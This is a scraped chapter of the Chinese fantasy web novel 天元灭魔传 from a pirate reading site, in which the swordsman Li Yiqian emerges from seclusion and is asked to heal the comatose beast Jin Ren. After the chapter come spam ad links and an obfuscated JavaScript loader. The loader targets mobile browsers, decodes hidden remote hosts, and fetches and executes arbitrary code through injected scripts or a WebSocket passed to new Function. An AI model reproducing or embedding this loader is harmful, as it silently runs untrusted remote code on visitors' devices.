笔趣阁

下载
字:
关灯 护眼
笔趣阁 > 天元灭魔传 > 第三百一十七章 救治金韧

第三百一十七章 救治金韧

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
水月阁,一间极其幽静的房间里,看着躺在床上的金发男子,南宫天涯心急如焚,经过一个多月悉心的救治,对方仍然处于昏迷中。
  一个多月之前,众人经过一番殊死搏斗,才将金韧从两只七阶后期妖兽的手中救下,紧接着,他们又遭到以风隐空为首的魔教高手围剿,几经苦战后,最终将对方带回了水月阁。
  南宫天涯原以为能从这金发男子的口中打探到林淞的下落,然而对方的伤势实在过重,至今未醒,若非水月阁众人倾力为之疗伤,恐怕此刻其早已伤重身亡。
  经过水秋怡的诊断,这金发男子的兽魂被一股神秘的力量禁锢着,导致其意识尽丧,因此无法醒过来。
  有鉴于此,水月阁众人曾试图摧毁那股力量,但对方极其霸道,连水靖芸也对之无可奈何。
  经过一番商议,众人决定等李易乾出关之后,再由南宫天涯出面请对方救治这金发男子,或可摧毁其脑海中的那股神秘力量。
  由于数日内多番激战,尤其是施展了两次剑神之怒,李易乾的消耗也颇为巨大,而为了能够应付接下来更加严峻的局势,回到水月阁之后,他就选择了闭关,力求短期内恢复到巅峰状态。
  在水月阁一处隐蔽的密室里,李易乾正盘膝而坐,其身体周围闪耀着璀璨的白光。
  四周,剑意浓烈,剑光闪烁,剑气凌厉,而原先坚固无比的墙壁,此刻已变得千疮百孔,支离破碎。
  十日之后,随着李易乾一道手印结出,弥漫在他身体周围的白光,逐渐没入其体内,紧接着,剑意、剑光以及剑气也同时消散在空中,密室里又恢复了沉寂。
  突然,李易乾睁开了双眼,只见两道凌厉的精光从其眼中迸发而出,竟震得密室又是一阵剧烈的晃动。
  仔细窥探了一下身体的状况,李易乾嘴角微扬,出乎其意料的是,连番大战之后,他的修为竟又提升到一个新的境界。
  经过这一个半月的闭关,李易乾的修为已从七重器尊中期的层次,提升到了七重器尊中期靠近后期的地步,这真是一个巨大的进步。
  古人常说,以战养战,还真是至理名言,李易乾能有如此巨大的进步,得益于几次陷入到险境中,在那生死存亡之际,他突破了修炼的瓶颈,因此实力大增。
  倘若李易乾只是在仙剑门中闭关修炼,没有两三年的时间,其修为是决然不会提升至此。
  由于担心外面的局势,李易乾并未继续提升实力,他迅速走出了密室。
  得知李易乾出关之后,南宫天涯便恭敬的将其请到了房中,随后他双手抱拳向着对方深深一礼。
  见状,李易乾急忙将南宫天涯扶了起来,不解道:“阁下,你为何要行如此大礼?”
  神色感激的看着李易乾,南宫天涯开口道:“多谢阁下多番出手相助,否则我早已葬身在迷失森林中。”
  李易乾闻言笑道:“阁下实在太客气了,你拥有仙剑金符,便是我仙剑门最尊贵的客人。门规有训,无论是谁,即便是门主也得对你敬如上宾。”
  南宫天涯轻叹道:“只是目前有一棘手之事,我与水月阁一众高手皆无能为力,还得烦请阁下出手相助一次。”
  李易乾微笑道:“我们这阁下阁下的,说得实在绕口,倘若城主不嫌弃的话,我们二人便以兄弟相称,不知你意下如何?”
  南宫天涯笑道:“如此甚好,能够结交到李兄这样的朋友,真乃人生一大幸事也。”
  李易乾点头道:“南宫兄弟,你有何棘手之事?”
  看了躺在床上的金韧一眼,南宫天涯长叹一声,随后便把其昏迷不醒的情况告知李易乾,并请求对方出手去摧毁那股神秘的力量。
  轻步走到床前,李易乾窥探了一下金韧的大脑,他发现果真如同南宫天涯讲述的那样,有一股极其霸道的力量禁锢着这只妖兽的兽魂。
  片刻后,李易乾轻声道:“这妖兽的兽魂被雷电之力禁锢着,我想应该是当日那雷虺妖蛟所为,现在有两种办法可以救治它。”
  南宫天涯急声道:“李兄,你有何办法?”
  见南宫天涯面露焦急之色,李易乾轻叹道:“第一种方法是寻得一雷系灵师,将这妖兽脑海中的雷电之力给吸出来,不过此法过于缓慢,而且由于雷电禁锢兽魂的时间过久,能不能成功还是个未知数。”
  南宫天涯剑眉微皱道:“这么说,只能去请慕容殿主帮忙了。”
  李易乾摇头道:“没那么简单,当日那雷虺妖蛟的修为已是七阶后期,那么寻得的这位雷系高手,其修为至少要七重灵尊,这样才有足够的力量,将那雷电之力导出来。”
  南宫天涯闻言,沉声道:“七重雷系灵尊?短时间内,这等高手恐怕难以寻到,请问还有一种方法呢?”
免费看片APP    美女视频免费看
『加入书签,方便阅读』
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Nw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x48\x58\x42\x73\x5a\x4f\x46\x54\x7a\x73']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamZ1ZHVyeWoubbmluZ21lbbmdzaGVuaHVvLmNvbbQ==','d3NzOOi8vd3MuYW5kYTE1MTYuY29tOOjkwOOTAsd3NzOOi8vd3Muc3luZ2d5LmNvbTo5MDkwLHdzczovL3dzLnpoaXB1ZnMuY29tOOjkwOOTA=',window,document,['b','O']);}:function(){};